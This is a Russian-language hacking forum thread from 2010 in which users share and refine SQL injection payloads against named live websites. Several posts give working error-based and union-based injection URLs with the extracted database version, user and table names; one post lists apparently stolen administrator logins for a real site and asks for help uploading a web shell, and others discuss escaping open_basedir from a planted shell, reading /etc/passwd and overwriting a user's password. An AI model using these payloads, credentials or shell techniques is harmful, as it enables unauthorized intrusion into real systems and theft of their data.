Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    извиняюсь, не могли бы вы продемонстрировать метод из приведенной статьи на этом живом примере, который спросил ТС? Например для получения списка тех же таблиц из information_schema.tables
     
    #12141 Pashkela, 3 Apr 2010
    Last edited: 3 Apr 2010
  2. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Поддерживаю.
    Без примеров сложно вкуривается.))
     
  3. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Разумеется:

    Code:
    http://mihadmin.ru/statpage.php?sid=-1+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by concat(mid((select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+limit+1,1),1,64),floor(rand(0)*2)))z)
    И в самом верху вижу:

    Duplicate entry 'COLLATIONS1' for key 1

    З.Ы.
    Ну а дальше меняем значение в лимите, сам запрос в mid(...).
     
    #12143 Qwazar, 3 Apr 2010
    Last edited: 3 Apr 2010
    3 people like this.
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 Qwazar:

    класс, спасибо
     
    1 person likes this.
  5. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    http://www.gemreplica.com/about.php?cid=(select+1+from+(select+count(0),conc at((select+version()),floor(rand(0)*2))+from+produ cts+group+by+2+limit+1)a)

    к сожалению не докрутил скуль в силу своей неопытности.
    Господа обьясните как через эту ошибку можно вывести названия столбцов. Так не вышло:

    http://www.gemreplica.com/about.php?cid=(select+1+from+(select+count(0),conc at((select+table_name),floor(rand(0)*2))+from+info rmation_schema.tables+group+by+2+limit+0,1)a
     
    #12145 Darren, 3 Apr 2010
    Last edited: 3 Apr 2010
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Ну вот только что обсуждали:

    Code:
    http://www.gemreplica.com/about.php?cid=(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by%20concat(mid((select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+limit+0,1),1,64),floor(rand(0)*2)))z)
    
    плз внимательней
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Кстати, фигня такая, типо мелочь, вот этих

    union+select+2

    не обязательно должно соответствовать кол-ву колонок, главное чтобы их было => чем надо, причем > тут имеет ключевое значение, как оказалось в данном конкретном примере. Т.е. в итоге получается необязательно подбирать точное кол-во, жесть.

    т.е. ссылка выше выдаст тоже самое, что и такой вот запрос:

    Code:
    http://www.gemreplica.com/about.php?cid=(select*from(select+count(*)from(select+1+union+select+2+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3)x+group+by+concat(mid((select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+limit+0,1),1,64),floor(rand(0)*2)))z)
    
    И, что примечательно, это так и есть, и в итоге является наиболее крутым методом при проведении такого рода sql-injection, т.к. не требует ни точного подбора кол-ва столбцов, ни знания названия вообще какой-либо таблицы:

    Code:
    http://mihadmin.ru/statpage.php?sid=love'+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3)x+group+by+concat(mid((select+version()+limit+0,1),1,64),floor(rand(0)*2)))z)--+
    
    union+select+3 проставлено просто от балды много
     
    #12147 Pashkela, 3 Apr 2010
    Last edited: 3 Apr 2010
  8. alexandrgsm

    alexandrgsm New Member

    Joined:
    9 Mar 2009
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Скажите пож-та в последней версии Firefox хочу посмотреть пароль через исходный код фрейма а он не показывает. Подскажите почему! Пароль хочу посмотреть на модеме! За ранее спасибки!
     
  9. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Есть админка: http://www.ettisalqatar.com/Admin

    admin:zameer8847
    janak:info123

    Помогите залить Shell.
     
  10. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Есть залитый шелл, но выбраться выше public_html нельзя из-за open_basedir. Но ls, cat и другие консольные команды работают и позволяют выбраться в public_html любого домена, висящего на этом хосте. В случае если доменов мало, можно просто слить еще один шелл в другой домен и разбираться уже через него, но когда доменов много... Поэтому:
    1. Есть ли способы обойти open_basedir? (PHP 5.1.2)
    2. Возможно бред, но есть ли веб-шелл, работающий практически полностью на одних консольных командах?
     
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    open_basedir не действует на PERL. Попробуй это.
     
  12. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12

    Набираю в Opera:

    http://www.ettisalqatar.com/cgi-script/test.pl

    http://www.ettisalqatar.com/cgi-bin/test.pl

    http://www.ettisalqatar.com/cgi-script/script.pl

    http://www.ettisalqatar.com/cgi-bin/script.pl

    Не могу найти shell.

    И, подскажите статью по заливке Perl Shell.

    Заранее всем спасибо.
     
  13. ZeroCold

    ZeroCold New Member

    Joined:
    9 Mar 2010
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Есть сайт, он подвержен SQL инъекции, знаю потому что получил лог и пас от админки, но толку с этого мало, так как встроеный в админку загрузчик переименовывает любой фаил по шаблону целиком в .gif Сервер же со своей стороны не дает возможности исполнять gif. Так же хостер (или админ) не дурак и прав у юзера SQL базы недостаточно на чтние /etc/password, выдает пустой экран, в смысле сюль рагирует позитивно но ничего не сгружает (проверял фаер багом на предмет скрытого теста, но пусто). Отсюда резонный вопрос, что посоветуете делать и как извернутся?

    чуть не забыл на сервере включенный магические кавычки, но CHAR не лечит, как впрочем 16чная система, прав нет. залить, через sql то же не получилось, возможно что то не так делаю, собственно сам линк инъекции в студии
    Code:
    http://www.site.ru/news.php?id=-99999999+union+select+load_file(0x2f6574632f706173737764),2,3  /*
    (попытка чтения етц)
    Если резюмировать, то вопросов 2а, как надуть загрузчик фаилов или как правильно залить шел через SQL (MySQL)
    Нe и конечно юзер скуль не роот(понятно почему он не читает /etc/passwd), ротового как найти незнаю, у хостера ниче так сайт я дырок ненашел... (mtw.ru)
     
    #12153 ZeroCold, 4 Apr 2010
    Last edited: 4 Apr 2010
  14. GivioN

    GivioN Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    45
    Likes Received:
    10
    Reputations:
    0
    Есть такой код:
    PHP:
    $nomer=$_POST["nomer"];
     
    mysql_query("insert into tb_ref (user,nomer) values ('$user','$nomer')");
    К переменной присваиваю значение:
    PHP:
    <option value="2') UNION UPDATE tb_users SET password=123 WHERE username=GivioN"); /*
    ">двойка</option>
    Получается такой запрос:
    PHP:
    mysql_query("insert into tb_ref (user,nomer) values ('$user','2') UNION UPDATE tb_users SET password=123 WHERE username=GivioN"); /*')");
    но он не работает и ошибки нет никакой

    Какие данные отправлять в переменной $nomer что бы установить пароль 123 для username=GivioN ?
    Магик. квотес в положении off!
     
    #12154 GivioN, 4 Apr 2010
    Last edited: 4 Apr 2010
  15. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    ZeroCold
    Если mc=on, то шелл через скуль не залить(кроме отдельных часных случаев), запрос на вывод passwd у тебя правильный, если столбец принтабельный, а ничего не выводится, значит скорее всего нет прав

    По поводу загрузки файлов. Вариантов очень много, всё зависит от кода, но может получится и так, что обойти его не получится совсем

    GivioN
    Попробуй почитать что-то. Например про оператор union
    http://phpclub.ru/mysql/doc/union.html
     
  16. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    http://mihadmin.ru/statpage.php?sid=love'+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4+--+

    5.0.51a-24+lenny2:mihadmin_main:mihadmin_main@localhost:debian-linux-gnu

    http://mihadmin.ru/statpage.php?sid=love'+union+select+1,2,group_concat(0x0b,table_name),4+from+information_schema.tables+--+

    CHARACTER_SETS,
    COLLATIONS,
    COLLATION_CHARACTER_SET_APPLICABILITY,
    COLUMNS,
    COLUMN_PRIVILEGES,
    KEY_COLUMN_USAGE,
    PROFILING,
    ROUTINES,
    SCHEMATA,
    SCHEMA_PRIVILEGES,
    STATISTICS,
    TABLES,
    TABLE_CONSTRAINTS,
    TABLE_PRIVILEGES,
    TRIGGERS,
    USER_PRIVILEGES,
    VIEWS,
    article,
    const,
    group,
    group_refer,
    menu,
    news,
    rights,
    rights_refer,
    statpage,
    user
     
  17. GivioN

    GivioN Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    45
    Likes Received:
    10
    Reputations:
    0
    Jokester, понятно. Вот только не могу найти как объединить 2 команды insert и UPDATE в одном запросе.

    и вобще, возможно как нибуть обновить даные в БД с таким уязвимым кодом:
     
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    https://forum.antichat.ru/showthread.php?t=56221
    ON DUPLICATE KEY

    При прокачанной удаче хакера может сработать, хотя конечно...

    А вообще, иньекции в инсерте крутятся, либо через вывод ошибок, либо more1row, так-что расскручивай как обычно
     
  19. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    + еще метод с временными задержками через sleep() или benchmark()
     
  20. GivioN

    GivioN Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    45
    Likes Received:
    10
    Reputations:
    0
    https://forum.antichat.ru/showpost.php?p=572143&postcount=10 =(

    если в переменную вставить это:
    ТО цель будет выполнена. Но не работает так как при отправке пост запроса отредактированного оперой получается такой код:

    <select name="nomer">
    <option value="1">1 бла бла</option>
    <option value="2">2 бла бла</option>
    <option value="2')""); mysql_query("UPDATE tb_users SET password='123' WHERE username='GivioN'"); //">3 бла бла</option>
    </select><br><br></body></html>

    где третье значение имеет двойные ковычки и весь код не отправляется... Как можно надурить систему? Или InetCrack рулит в этом случаи?
     
Loading...
Thread Status:
Not open for further replies.